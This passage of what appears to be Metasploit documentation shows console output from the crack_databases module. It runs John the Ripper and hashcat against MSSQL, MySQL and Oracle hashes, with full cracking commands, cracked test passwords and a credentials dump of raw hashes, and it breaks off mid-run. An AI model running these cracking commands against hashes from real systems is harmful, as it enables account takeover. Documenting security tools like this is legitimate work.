+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJ1VeTcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mysql-sha1 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+
+[*] Checking oracle hashes already cracked...
+[*] Cracking oracle hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 15:45) 66.66g/s 364200p/s 1092Kc/s 1092KC/s TEST3:::..T1900
+Use the "--show --format=oracle" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking oracle hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
+Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
+Almost done: Processing the remaining buffered candidate passwords, if any.
+Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
+Proceeding with incremental:ASCII
+Warning: mixed-case charset, but the current hash type is case-insensitive;
+some candidate passwords may be unnecessarily tried more than once.
+0g 0:00:01:00  3/3 0g/s 2705Kp/s 2705Kc/s 2705KC/s LML489..LST0WO
+Session stopped (max run-time reached)
+[*] Cracking oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
+Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
+Almost done: Processing the remaining buffered candidate passwords, if any.
+Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
+Proceeding with incremental:ASCII
+Warning: mixed-case charset, but the current hash type is case-insensitive;
+some candidate passwords may be unnecessarily tried more than once.
+0g 0:00:01:00  3/3 0g/s 2700Kp/s 2700Kc/s 2700KC/s CKS5ER..CGE0DW
+Session stopped (max run-time reached)
+[*] Cracking oracle hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:01:00  0g/s 2880Kp/s 2880Kc/s 2880KC/s 225486472..229896168
+Session stopped (max run-time reached)
+[*] Cracking oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=MEvIkaAE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-05-31 15:48) 0g/s 16700p/s 16700c/s 16700C/s TEST3:::..HASHCATING
+Session completed
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+
+[*] Checking dynamic_1506 hashes already cracked...
+[*] Cracking dynamic_1506 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=A4uwmyRE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1506 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+
+[*] Checking raw-sha1,oracle hashes already cracked...
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=olCLdt27 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=raw-sha1,oracle --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Unknown ciphertext format name requested
+Unknown ciphertext format name requested
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+
+[*] Checking oracle11 hashes already cracked...
+[*] Cracking oracle11 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:48) 100.0g/s 2400p/s 2400c/s 2400C/s epsilon..Buddahh
+Warning: passwords printed above might not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking oracle11 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=sYHhhqvp --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle11 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+ 1363   oracle11    DEMO                epsilon           Single
+ 1364   oracle11    oracle11_epsilon    epsilon           Single
+
+[*] Checking oracle12c hashes already cracked...
+[*] Cracking oracle12c hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:48) 16.66g/s 2133p/s 2133c/s 2133C/s test3:::..password0
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking oracle12c hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=glBBUtZH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=oracle12c --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username            Cracked Password  Method
+ -----  ---------   --------            ----------------  ------
+ 1356   mssql05     mssql05_toto        toto              Single
+ 1357   mssql       mssql_foo           FOO               Single
+ 1358   mssql12     mssql12_Password1!  Password1!        Single
+ 1359   mysql       mysql_probe         probe             Single
+ 1360   mysql-sha1  mysql-sha1_tere     tere              Single
+ 1361   oracle      simon               A                 Single
+ 1362   oracle      SYSTEM              THALES            Single
+ 1363   oracle11    DEMO                epsilon           Single
+ 1364   oracle11    oracle11_epsilon    epsilon           Single
+ 1365   oracle12c   oracle12c_epsilon   epsilon           Single
+
+[*] Checking dynamic_1034 hashes already cracked...
+[*] Cracking dynamic_1034 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:48) 50.00g/s 168000p/s 168000c/s 168000C/s test3:::..:::3tset4
+Use the "--show --format=dynamic_1034" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking dynamic_1034 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=Ici8lKLE --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=dynamic_1034 --wordlist=/tmp/jtrtmp20190531-29358-11uv1t0 --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-29358-125bmsb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type     Username            Cracked Password  Method
+ -----  ---------     --------            ----------------  ------
+ 1356   mssql05       mssql05_toto        toto              Single
+ 1357   mssql         mssql_foo           FOO               Single
+ 1358   mssql12       mssql12_Password1!  Password1!        Single
+ 1359   mysql         mysql_probe         probe             Single
+ 1360   mysql-sha1    mysql-sha1_tere     tere              Single
+ 1361   oracle        simon               A                 Single
+ 1362   oracle        SYSTEM              THALES            Single
+ 1363   oracle11      DEMO                epsilon           Single
+ 1364   oracle11      oracle11_epsilon    epsilon           Single
+ 1365   oracle12c     oracle12c_epsilon   epsilon           Single
+ 1366   dynamic_1034  example             password          Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       mssql_foo           foo                                                                                                                                                                                                                                                                          Password            
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+                       simon               A                                                                                                                                                                                                                                                                            Password            
+                       SYSTEM              THALES                                                                                                                                                                                                                                                                       Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       example             password                                                                                                                                                                                                                                                                     Password            
+                       mssql12_Password1!  Password1!                                                                                                                                                                                                                                                                   Password            
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_databases
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-29687-sp1ejs
+[*] Wordlist file written out to /tmp/jtrtmp20190531-29687-1u8mjuq
+[*] Checking mssql hashes already cracked...
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZTr4DsK --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=131 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZTr4DsK --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=131 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZTr4DsK --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=131 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username   Cracked Password  Method
+ -----  ---------  --------   ----------------  ------
+ 1380   mssql      mssql_foo  FOO               Wordlist
+
+[*] Checking mssql05 hashes already cracked...
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=gKYO7rts --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=132 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql05 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=gKYO7rts --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=132 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql05 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=gKYO7rts --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=132 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1379   mssql05    mssql05_toto  toto              Wordlist
+ 1380   mssql      mssql_foo     FOO               Wordlist
+
+[*] Checking mssql12 hashes already cracked...
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=X5k9f6JY --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1731 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql12 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=X5k9f6JY --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1731 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mssql12 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=X5k9f6JY --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1731 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1379   mssql05    mssql05_toto  toto              Wordlist
+ 1380   mssql      mssql_foo     FOO               Wordlist
+
+[*] Checking mysql hashes already cracked...
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=L2YwjG1w --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=200 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=L2YwjG1w --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=200 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=L2YwjG1w --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=200 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1379   mssql05    mssql05_toto  toto              Wordlist
+ 1380   mssql      mssql_foo     FOO               Wordlist
+ 1382   mysql      mysql_probe   probe             Wordlist
+
+[*] Checking mysql-sha1 hashes already cracked...
+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=jMcLuSDn --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=300 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mysql-sha1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=jMcLuSDn --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=300 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
